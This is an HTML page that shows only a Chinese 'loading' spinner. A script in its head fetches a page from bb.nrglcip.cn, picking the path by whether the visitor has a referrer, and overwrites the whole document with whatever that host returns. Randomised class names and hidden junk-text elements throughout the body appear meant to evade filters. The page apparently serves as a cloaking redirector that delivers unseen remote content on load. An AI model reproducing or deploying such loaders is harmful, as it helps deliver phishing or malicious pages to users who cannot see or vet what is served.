<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .AyMOl2oKH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .AyMOl2oKH .EvYSv4 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .AyMOl2oKH .content {
            line-height: 50px;
            text-align: center
        }

        .AyMOl2oKH .img {
            width: 100%
        }

        .AyMOl2oKH .ot43RlL3A9 {
            text-align: center
        }

        .AyMOl2oKH .ot43RlL3A9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .AyMOl2oKH .ot43RlL3A9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .AyMOl2oKH .ot43RlL3A9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .AyMOl2oKH .ot43RlL3A9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .AyMOl2oKH .ot43RlL3A9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .AyMOl2oKH .ot43RlL3A9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .AyMOl2oKH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FG4Uvv1dVVmfd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var R53Tjf = FG4Uvv1dVVmfd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ R53Tjf +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ R53Tjf +".html?a=share";
		}
		
        HXXtUcwE=url+"#"+new Date().getTime();
        HXXtUcwE && function() {
            $.get(HXXtUcwE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >oOqHRVLcsybVpmftbAy6MzqhRUpi5OfiOVxyUo</h1>
<b style='display:none' >revWt2dcndp4p9WrVtKyxxQvidEuzKMy</b>
<span style='display:none'>Y2rjYI50GFsu1wYI0mWRh0ghQjurLwrZZuptt7qu4DdWRzaUkC8q2iGh8p26AJLZMCUp91q5MLarjRcVOj3waqnAisoRbufPsS</span>
<span style='display:none'>Y2rjYI50GFsu1wYI0mWRh0ghQjurLwrZZuptt7qu4DdWRzaUkC8q2iGh8p26AJLZMCUp91q5MLarjRcVOj3waqnAisoRbufPsS</span>
<li style='display:none' >xq6RU4B5AeT2LCykRFrUdkvz9ExmiqNsePX</li>
<ul style='display:none' >zTBxLT1NHCKfmxCMcy0CxI6q7uyo8FYuXf34lBj1YFNwIw86Is7A5ay96uEirP7duJ70druitAzac9j6hyOmRojxWVagKsay87n</ul>
<h1 style='display:none' >oOqHRVLcsybVpmftbAy6MzqhRUpi5OfiOVxyUo</h1>
<a  href='#' style='display:none'>ic4cSkja1N8</a><div class="AyMOl2oKH">
    <div class="EvYSv4">
        <div class="ot43RlL3A9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>YwMR0k7y4mnNsh8WdhY0JwE7X91j3vfzcGdzdC</div>
<span style='display:none'>DSNj4jv5jI3nP3mNdOf0QBsVm8vBRJSjXA0AHDz</span>
<div style='display:none'>YwMR0k7y4mnNsh8WdhY0JwE7X91j3vfzcGdzdC</div></body>
</html>